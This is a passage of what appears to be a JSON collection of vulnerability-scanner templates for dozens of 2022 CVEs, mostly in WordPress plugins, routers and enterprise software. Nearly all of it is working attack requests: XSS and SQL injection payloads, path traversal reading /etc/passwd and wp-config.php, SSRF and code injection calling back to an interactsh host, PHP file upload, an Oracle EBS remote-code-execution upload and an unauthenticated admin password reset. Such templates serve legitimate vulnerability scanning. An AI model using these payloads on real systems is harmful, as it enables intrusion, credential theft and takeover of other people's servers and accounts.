HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-3982\"); ?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/doAs?=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; 